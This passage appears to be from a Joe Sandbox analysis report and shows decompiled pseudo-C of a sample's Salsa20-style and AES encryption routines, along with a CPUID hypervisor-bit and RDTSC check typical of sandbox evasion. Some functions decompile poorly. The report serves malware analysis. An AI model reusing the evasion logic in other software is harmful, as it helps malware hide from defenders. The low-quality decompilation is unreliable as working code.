				intOrPtr _t301;
				signed int _t306;
				signed int _t307;
				void* _t310;
				signed int _t312;
				signed int* _t313;

				_t313 =  &_v132;
				_t287 = _a12;
				_v76 = _t287;
				_v88 = _a8;
				if(_a4 != 0) {
					_v72 = _t287 + 0x3c;
					do {
						asm("movups xmm0, [esi]");
						_v84 = 0xa;
						asm("movups [esp+0x50], xmm0");
						asm("movups xmm0, [esi+0x10]");
						asm("movups [esp+0x60], xmm0");
						asm("movups xmm0, [esi+0x20]");
						asm("movups [esp+0x70], xmm0");
						asm("movups xmm0, [esi+0x30]");
						_t263 = _v24;
						_t288 = _v52;
						_v100 = _v28;
						_v120 = _v32;
						_v116 = _v36;
						_v124 = _v40;
						_v128 = _v44;
						_v104 = _v48;
						_v132 = _v56;
						_v112 = _v60;
						asm("movups [esp+0x80], xmm0");
						_t253 = _v8;
						_t248 = _v12;
						_t306 = _v16;
						_t270 = _v20;
						_v96 = _v64;
						_t188 = _v68;
						_v108 = _t188;
						while(1) {
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _t188 + _t270;
							_v92 = _t289;
							asm("rol eax, 0x9");
							_v116 = _v116 ^ _v108 + _t289;
							_t290 = _v96;
							asm("rol eax, 0xd");
							_t271 = _t270 ^ _v116 + _t289;
							_v80 = _t271;
							asm("ror eax, 0xe");
							_v108 = _v108 ^ _v116 + _t271;
							_t272 = _v104;
							asm("rol eax, 0x7");
							_v120 = _v120 ^ _t290 + _t272;
							asm("rol eax, 0x9");
							_t307 = _t306 ^ _v120 + _t272;
							asm("rol eax, 0xd");
							_t291 = _t290 ^ _v120 + _t307;
							_v96 = _t291;
							_t292 = _v100;
							asm("ror eax, 0xe");
							_v104 = _t272 ^ _t291 + _t307;
							asm("rol eax, 0x7");
							_t249 = _t248 ^ _v128 + _t292;
							asm("rol eax, 0x9");
							_v112 = _v112 ^ _t249 + _t292;
							asm("rol eax, 0xd");
							_v128 = _v128 ^ _v112 + _t249;
							asm("ror eax, 0xe");
							asm("rol eax, 0x7");
							_v132 = _v132 ^ _t263 + _t253;
							_v100 = _t292 ^ _v128 + _v112;
							_t294 = _v108;
							asm("rol eax, 0x9");
							_v124 = _v124 ^ _v132 + _t253;
							asm("rol eax, 0xd");
							_t264 = _t263 ^ _v124 + _v132;
							asm("ror eax, 0xe");
							_t254 = _t253 ^ _v124 + _t264;
							asm("rol eax, 0x7");
							_t275 = _v96 ^ _v132 + _t294;
							_v96 = _t275;
							_v64 = _t275;
							asm("rol eax, 0x9");
							_t296 = _v112 ^ _t275 + _t294;
							_v112 = _t296;
							_v60 = _t296;
							asm("rol eax, 0xd");
							_v132 = _v132 ^ _t296 + _t275;
							_t220 = _v132;
							_v56 = _t220;
							asm("ror eax, 0xe");
							_t298 = _v108 ^ _t220 + _t296;
							asm("rol eax, 0x7");
							_v128 = _v128 ^ _v92 + _v104;
							_t224 = _v128;
							_v44 = _t224;
							asm("rol eax, 0x9");
							_v124 = _v124 ^ _t224 + _v104;
							_t226 = _v124;
							_v40 = _t226;
							asm("rol eax, 0xd");
							_t277 = _v92 ^ _t226 + _v128;
							_v108 = _t298;
							_v92 = _t277;
							asm("ror eax, 0xe");
							_v52 = _t277;
							_t279 = _v104 ^ _v124 + _t277;
							_v68 = _t298;
							_t299 = _v100;
							_v104 = _t279;
							asm("rol eax, 0x7");
							_t263 = _t264 ^ _v120 + _t299;
							_v48 = _t279;
							asm("rol eax, 0x9");
							_v116 = _v116 ^ _t263 + _t299;
							_t233 = _v116;
							_v36 = _t233;
							asm("rol eax, 0xd");
							_v120 = _v120 ^ _t233 + _t263;
							_t235 = _v120;
							_v32 = _t235;
							asm("ror eax, 0xe");
							_t300 = _t299 ^ _t235 + _v116;
							asm("rol eax, 0x7");
							_t270 = _v80 ^ _t249 + _t254;
							_v100 = _t300;
							_v28 = _t300;
							_v20 = _t270;
							asm("rol eax, 0x9");
							_t306 = _t307 ^ _t270 + _t254;
							asm("rol eax, 0xd");
							_t248 = _t249 ^ _t270 + _t306;
							asm("ror eax, 0xe");
							_t253 = _t254 ^ _t248 + _t306;
							_t131 =  &_v84;
							 *_t131 = _v84 - 1;
							_t188 = _v108;
							if( *_t131 == 0) {
								break;
							}
							_t288 = _v92;
						}
						_t301 = _v76;
						_t241 = 0;
						_t281 = _v88;
						_v8 = _t253;
						_v24 = _t263;
						_t265 = _a4;
						_v12 = _t248;
						_v16 = _t306;
						if( &_v68 > _v72 ||  &_v8 < _t301) {
							do {
								asm("movups xmm1, [esp+eax*4+0x50]");
								asm("movups xmm0, [esi+eax*4]");
								asm("paddd xmm1, xmm0");
								asm("movups [esp+eax*4+0x50], xmm1");
								asm("movups xmm0, [esp+eax*4+0x60]");
								asm("movups xmm1, [esi+eax*4+0x10]");
								asm("paddd xmm1, xmm0");
								asm("movups [esp+eax*4+0x60], xmm1");
								_t241 = _t241 + 8;
							} while (_t241 < 0x10);
							goto L10;
						} else {
							do {
								 *((intOrPtr*)(_t313 + 0x50 + _t241 * 4)) =  *((intOrPtr*)(_t313 + 0x50 + _t241 * 4)) +  *((intOrPtr*)(_t301 + _t241 * 4));
								_t241 = _t241 + 1;
							} while (_t241 < 0x10);
							L10:
							 *((intOrPtr*)(_t301 + 0x20)) =  *((intOrPtr*)(_t301 + 0x20)) + 1;
							_t242 = 0x40;
							asm("adc dword [esi+0x24], 0x0");
							_t251 =  >  ? 0x40 : _t265;
							_t266 = 0;
							if(_t251 == 0) {
								goto L21;
							}
							if(_t251 < 0x20) {
								L17:
								if(_t266 >= _t251) {
									goto L21;
								}
								_t256 = _t266 + _t281;
								_t310 =  &_v68 - _t281;
								_t284 = _t251 - _t266;
								do {
									_t242 =  *((intOrPtr*)(_t256 + _t310));
									_t256 = _t256 + 1;
									 *(_t256 - 1) =  *(_t256 - 1) ^ _t242;
									_t284 = _t284 - 1;
								} while (_t284 != 0);
								_t281 = _v88;
								goto L21;
							}
							_t258 = _t281 - 1 + _t251;
							if(_t281 > _t313 + _t251 + 0x4f) {
								L14:
								_t259 = _t281;
								_t245 =  ~_t281;
								_t312 = _t251 & 0xffffffe0;
								_v80 =  &_v68 + _t245;
								_t281 = _v88;
								_v84 =  &_v52 + _t245;
								_t242 = _v80;
								do {
									asm("movups xmm0, [ecx]");
									_t266 = _t266 + 0x20;
									_t259 = _t259 + 0x20;
									asm("movups xmm1, [eax+ecx-0x20]");
									asm("pxor xmm1, xmm0");
									asm("movups [ecx-0x20], xmm1");
									asm("movups xmm0, [ecx-0x10]");
									asm("movups xmm1, [esi+ecx-0x20]");
									asm("pxor xmm1, xmm0");
									asm("movups [ecx-0x10], xmm1");
								} while (_t266 < _t312);
								goto L17;
							}
							_t242 =  &_v68;
							if(_t258 >= _t242) {
								goto L17;
							}
							goto L14;
						}
						L21:
						_t268 = _a4 - _t251;
						_v88 = _t281 + _t251;
						_a4 = _t268;
					} while (_t268 != 0);
					return _t242;
				}
				return _t177;
			}



















































































                  0x00d020bc
                  0x00d020ca
                  0x00d020d1
                  0x00d020dd
                  0x00d020e3
                  0x00d020ee
                  0x00d020f2
                  0x00d020f2
                  0x00d020f5
                  0x00d020fd
                  0x00d02102
                  0x00d02106
                  0x00d0210b
                  0x00d0210f
                  0x00d02118
                  0x00d0211c
                  0x00d02120
                  0x00d02124
                  0x00d0212c
                  0x00d02134
                  0x00d0213c
                  0x00d02144
                  0x00d0214c
                  0x00d02154
                  0x00d0215c
                  0x00d02164
                  0x00d0216c
                  0x00d02173
                  0x00d0217a
                  0x00d02181
                  0x00d02188
                  0x00d0218c
                  0x00d02190
                  0x00d0219a
                  0x00d0219c
                  0x00d0219f
                  0x00d021a7
                  0x00d021ab
                  0x00d021ae
                  0x00d021b8
                  0x00d021bc
                  0x00d021bf
                  0x00d021c7
                  0x00d021cb
                  0x00d021ce
                  0x00d021d2
                  0x00d021d9
                  0x00d021dc
                  0x00d021e6
                  0x00d021e9
                  0x00d021f1
                  0x00d021f4
                  0x00d021f6
                  0x00d021fd
                  0x00d02201
                  0x00d0220c
                  0x00d02210
                  0x00d02213
                  0x00d0221c
                  0x00d0221f
                  0x00d02229
                  0x00d0222c
                  0x00d02238
                  0x00d02240
                  0x00d02243
                  0x00d0224d
                  0x00d02251
                  0x00d02255
                  0x00d02258
                  0x00d02264
                  0x00d02267
                  0x00d0226f
                  0x00d02272
                  0x00d0227a
                  0x00d0227d
                  0x00d0227f
                  0x00d02283
                  0x00d0228e
                  0x00d02291
                  0x00d02293
                  0x00d02297
                  0x00d022a2
                  0x00d022a5
                  0x00d022a9
                  0x00d022ad
                  0x00d022b3
                  0x00d022ba
                  0x00d022c4
                  0x00d022c7
                  0x00d022cb
                  0x00d022cf
                  0x00d022d7
                  0x00d022da
                  0x00d022de
                  0x00d022e2
                  0x00d022ea
                  0x00d022ed
                  0x00d022ef
                  0x00d022f9
                  0x00d022fd
                  0x00d02300
                  0x00d02308
                  0x00d0230a
                  0x00d0230e
                  0x00d02318
                  0x00d0231c
                  0x00d0231f
                  0x00d02321
                  0x00d0232c
                  0x00d0232f
                  0x00d02333
                  0x00d02337
                  0x00d0233d
                  0x00d02340
                  0x00d02344
                  0x00d02348
                  0x00d02350
                  0x00d02353
                  0x00d02358
                  0x00d0235b
                  0x00d0235d
                  0x00d02361
                  0x00d02365
                  0x00d0236f
                  0x00d02372
                  0x00d02377
                  0x00d0237a
                  0x00d0237f
                  0x00d02382
                  0x00d02384
                  0x00d02384
                  0x00d02389
                  0x00d0238d
                  0x00000000
                  0x00000000
                  0x00d02196
                  0x00d02196
                  0x00d02393
                  0x00d02397
                  0x00d02399
                  0x00d0239d
                  0x00d023a8
                  0x00d023ac
                  0x00d023b3
                  0x00d023ba
                  0x00d023c5
                  0x00d023e1
                  0x00d023e1
                  0x00d023e6
                  0x00d023ea
                  0x00d023ee
                  0x00d023f3
                  0x00d023f8
                  0x00d023fd
                  0x00d02401
                  0x00d02406
                  0x00d02409
                  0x00000000
                  0x00d023d2
                  0x00d023d2
                  0x00d023d5
                  0x00d023d9
                  0x00d023da
                  0x00d0240e
                  0x00d0240e
                  0x00d02414
                  0x00d02419
                  0x00d02420
                  0x00d02423
                  0x00d02427
                  0x00000000
                  0x00000000
                  0x00d02430
                  0x00d024a1
                  0x00d024a3
                  0x00000000
                  0x00000000
                  0x00d024a9
                  0x00d024ac
                  0x00d024b0
                  0x00d024b2
                  0x00d024b2
                  0x00d024b5
                  0x00d024b8
                  0x00d024bb
                  0x00d024bb
                  0x00d024c0
                  0x00000000
                  0x00d024c0
                  0x00d02439
                  0x00d0243d
                  0x00d02447
                  0x00d0244d
                  0x00d0244f
                  0x00d02459
                  0x00d0245e
                  0x00d02462
                  0x00d02466
                  0x00d0246a
                  0x00d02472
                  0x00d02472
                  0x00d02475
                  0x00d02478
                  0x00d0247b
                  0x00d02480
                  0x00d02484
                  0x00d02488
                  0x00d0248c
                  0x00d02491
                  0x00d02495
                  0x00d02499
                  0x00000000
                  0x00d0249d
                  0x00d0243f
                  0x00d02445
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00d02445
                  0x00d024c4
                  0x00d024cd
                  0x00d024cf
                  0x00d024d3
                  0x00d024da
                  0x00000000
                  0x00d024e3
                  0x00d024ec

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ae1b344ce7eabeca7d5a0e2004a9b7e15b356c338447e056007cc76e97bc746
                  • Instruction ID: 611e7ed19b1f12d174f7151270656e27eec96be416a4cfae9ea8eda69d35ce25
                  • Opcode Fuzzy Hash: 5ae1b344ce7eabeca7d5a0e2004a9b7e15b356c338447e056007cc76e97bc746
                  • Instruction Fuzzy Hash: 54D1E4719083818FC790CF29C58465AF7E5FFD8348F149A1EE9D9D3211E770EA998B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D05228 Relevance: .3, Instructions: 287COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00D05228(signed int* _a4, signed int* _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				unsigned int _v24;
				signed int _v28;
				unsigned int _v32;
				unsigned int _v36;
				signed int _t239;
				signed int* _t418;
				signed int* _t419;
				unsigned int _t420;
				unsigned int _t421;
				signed int* _t422;

				_t419 = _a4;
				_t418 = 0xd251f4;
				asm("bswap eax");
				asm("bswap ebx");
				asm("bswap ecx");
				asm("bswap edx");
				_t5 =  &(_t418[1]); // 0x0
				_t6 =  &(_t418[2]); // 0x0
				_t7 =  &(_t418[3]); // 0x0
				_v8 =  *_t419 ^  *0xd251f4;
				_v12 = _t419[1] ^  *_t5;
				_v16 = _t419[2] ^  *_t6;
				_v20 = _t419[3] ^  *_t7;
				_t420 =  *0xd253f4; // 0x0
				_t421 = _t420 >> 1;
				while(1) {
					_t24 =  &(_t418[4]); // 0x0
					_v24 =  *(0xd024f0 + (_v8 >> 0x18) * 4) ^  *(0xd028f0 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v20 & 0x000000ff) * 4) ^  *_t24;
					_t38 =  &(_t418[5]); // 0x0
					_v28 =  *(0xd024f0 + (_v12 >> 0x18) * 4) ^  *(0xd028f0 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v8 & 0x000000ff) * 4) ^  *_t38;
					_t52 =  &(_t418[6]); // 0x0
					_v32 =  *(0xd024f0 + (_v16 >> 0x18) * 4) ^  *(0xd028f0 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v12 & 0x000000ff) * 4) ^  *_t52;
					_t66 =  &(_t418[7]); // 0x0
					_v36 =  *(0xd024f0 + (_v20 >> 0x18) * 4) ^  *(0xd028f0 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v16 & 0x000000ff) * 4) ^  *_t66;
					_t418 =  &(_t418[8]);
					_t421 = _t421 - 1;
					if(_t421 == 0) {
						break;
					}
					_v8 =  *(0xd024f0 + (_v24 >> 0x18) * 4) ^  *(0xd028f0 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v32 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v36 & 0x000000ff) * 4) ^  *_t418;
					_t93 =  &(_t418[1]); // 0x0
					_v12 =  *(0xd024f0 + (_v28 >> 0x18) * 4) ^  *(0xd028f0 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v36 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v24 & 0x000000ff) * 4) ^  *_t93;
					_t107 =  &(_t418[2]); // 0x0
					_v16 =  *(0xd024f0 + (_v32 >> 0x18) * 4) ^  *(0xd028f0 + (_v36 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v28 & 0x000000ff) * 4) ^  *_t107;
					_t121 =  &(_t418[3]); // 0x0
					_v20 =  *(0xd024f0 + (_v36 >> 0x18) * 4) ^  *(0xd028f0 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd02cf0 + (_v28 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd030f0 + (_v32 & 0x000000ff) * 4) ^  *_t121;
				}
				_t422 = _a8;
				asm("bswap eax");
				 *_t422 =  *(0xd034f0 + (_v24 >> 0x18) * 4) & 0xff000000 ^  *(0xd034f0 + (_v28 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0xd034f0 + (_v32 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0xd034f0 + (_v36 & 0x000000ff) * 4) & 0x000000ff ^  *_t418;
				_t148 =  &(_t418[1]); // 0x0
				asm("bswap eax");
				_t422[1] =  *(0xd034f0 + (_v28 >> 0x18) * 4) & 0xff000000 ^  *(0xd034f0 + (_v32 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0xd034f0 + (_v36 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0xd034f0 + (_v24 & 0x000000ff) * 4) & 0x000000ff ^  *_t148;
				_t162 =  &(_t418[2]); // 0x0
				asm("bswap eax");
				_t422[2] =  *(0xd034f0 + (_v32 >> 0x18) * 4) & 0xff000000 ^  *(0xd034f0 + (_v36 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0xd034f0 + (_v24 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0xd034f0 + (_v28 & 0x000000ff) * 4) & 0x000000ff ^  *_t162;
				_t176 =  &(_t418[3]); // 0x0
				_t239 =  *(0xd034f0 + (_v36 >> 0x18) * 4) & 0xff000000 ^  *(0xd034f0 + (_v24 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0xd034f0 + (_v28 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0xd034f0 + (_v32 & 0x000000ff) * 4) & 0x000000ff ^  *_t176;
				asm("bswap eax");
				_t422[3] = _t239;
				return _t239;
			}

















                  0x00d05232
                  0x00d05235
                  0x00d05245
                  0x00d05247
                  0x00d05249
                  0x00d0524b
                  0x00d0524f
                  0x00d05252
                  0x00d05255
                  0x00d05258
                  0x00d0525b
                  0x00d0525e
                  0x00d05261
                  0x00d05264
                  0x00d0526a
                  0x00d0526c
                  0x00d052b5
                  0x00d052b8
                  0x00d05304
                  0x00d05307
                  0x00d05353
                  0x00d05356
                  0x00d053a2
                  0x00d053a5
                  0x00d053a8
                  0x00d053ab
                  0x00d053ac
                  0x00000000
                  0x00000000
                  0x00d053fd
                  0x00d05449
                  0x00d0544c
                  0x00d05498
                  0x00d0549b
                  0x00d054e7
                  0x00d054ea
                  0x00d054ea
                  0x00d054f2
                  0x00d05557
                  0x00d05559
                  0x00d055bb
                  0x00d055be
                  0x00d055c0
                  0x00d05623
                  0x00d05626
                  0x00d05628
                  0x00d0568b
                  0x00d0568b
                  0x00d0568e
                  0x00d05690
                  0x00d0569a

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c18a7051f30b7aa38127b476d2c2a649f24e7bf3134880ed284d2a20d629317
                  • Instruction ID: ec7cee780b210f7aa87e2410bf42aa2213651dfbda10a338c7986930c607387b
                  • Opcode Fuzzy Hash: 6c18a7051f30b7aa38127b476d2c2a649f24e7bf3134880ed284d2a20d629317
                  • Instruction Fuzzy Hash: EED11E7AE2164A8FDB14CF59ECD1B7AB372FB98300F098538CA05D7756C634AA11DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D08088 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fbbc7bd8e1b41ae16e53a613ed7b51b0d0a79c3018c925f2fc8d0fe1b09f75df
                  • Instruction ID: 6b1d9bb6fd0ef430e7a9f2eed0bd79483326e9d61fba780dc6e81d2038ad917a
                  • Opcode Fuzzy Hash: fbbc7bd8e1b41ae16e53a613ed7b51b0d0a79c3018c925f2fc8d0fe1b09f75df
                  • Instruction Fuzzy Hash: 0C31E236B8AB0646FF75E15096417F7A216EF207A4EDD1523D8CE432C24C684E83B677
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D04D13 Relevance: .1, Instructions: 77COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 33%
                  			E00D04D13(intOrPtr* __eax, void* _a8) {
				intOrPtr* _v0;
				signed char _t343;
				void* _t431;
				intOrPtr* _t435;

				asm("sbb eax, [eax]");
				 *__eax =  *__eax + __eax;
				_push(_t441);
				_t435 = _v0;
				_t343 =  *(_t435 + 8);
				asm("bswap eax");
				asm("bswap ebx");
				asm("bswap ecx");
				asm("bswap edx");
				 *0xd251f4 =  *_t435;
				 *0x00D251F8 =  *((intOrPtr*)(_t435 + 4));
				_t431 = 0xd251f3;
				 *(_t343 + 0x4d8b0c57) =  *(_t343 + 0x4d8b0c57) | _t343;
				asm("stc");
				asm("sbb [edx+0x25], dh");
			}







                  0x00d04d13
                  0x00d04d15
                  0x00d04d18
                  0x00d04d1e
                  0x00d04d2b
                  0x00d04d31
                  0x00d04d33
                  0x00d04d35
                  0x00d04d37
                  0x00d04d39
                  0x00d04d3b
                  0x00d04d3f
                  0x00d04d40
                  0x00d04d48
                  0x00d04d49

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b6101de9c68194539cd2d8a881880527a2650cee1596920065010c021ad56f4
                  • Instruction ID: f2d1751622ad22e881347af7dcb2ed8ca30a56f3c09bfd0a9b78e4484b8c143e
                  • Opcode Fuzzy Hash: 0b6101de9c68194539cd2d8a881880527a2650cee1596920065010c021ad56f4
                  • Instruction Fuzzy Hash: A4311CB6A11A069FC318CF1AD884A25F7E1FF9D310715CA28DA5DC7B92D730F951CAA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D010D4 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  C-Code - Quality: 34%
                  			E00D010D4() {
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t12;
				signed int _t14;
				signed int _t15;

				_t9 = 1;
				asm("cpuid");
				_t10 = _t9 & 0xffffff00 | (_t15 & 0x40000000) != 0x00000000;
				if(_t10 == 0) {
					_t11 = 7;
					asm("cpuid");
					_t12 = _t11 & 0xffffff00 | (_t14 & 0x00040000) != 0x00000000;
					if(_t12 == 0) {
						asm("rdtsc");
						asm("ror ecx, 0xd");
						asm("rdtsc");
						asm("rol edx, 0xd");
						return _t12;
					} else {
						asm("invalid");
						asm("invalid");
						return _t12;
					}
				} else {
					asm("invalid");
					asm("invalid");
					return _t10;
				}
			}









                  0x00d010d8
                  0x00d010d9
                  0x00d010e1
                  0x00d010e6
                  0x00d010f3
                  0x00d010f6
                  0x00d010fe
                  0x00d01103
                  0x00d0110e
                  0x00d01112
                  0x00d01115
                  0x00d01119
                  0x00d01120
                  0x00d01105
                  0x00d01105
                  0x00d01108
                  0x00d0110d
                  0x00d0110d
                  0x00d010e8
                  0x00d010e8
                  0x00d010eb
                  0x00d010f0
                  0x00d010f0

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e9e9d037a559c25274071be2e09c2d3cf2f15b9f66fb5d997d9d64617e40bf4
                  • Instruction ID: dde6855805d5ed540f3301e7cad0bf03d3b133063c73a36c646e2473452c0108
                  • Opcode Fuzzy Hash: 6e9e9d037a559c25274071be2e09c2d3cf2f15b9f66fb5d997d9d64617e40bf4
                  • Instruction Fuzzy Hash: ABE0DFBB30D3025FF928810274533A78383C380275E29849EF506CF1C0EF1BE8A52056
                  Uniqueness

                  Uniqueness Score: -1.00%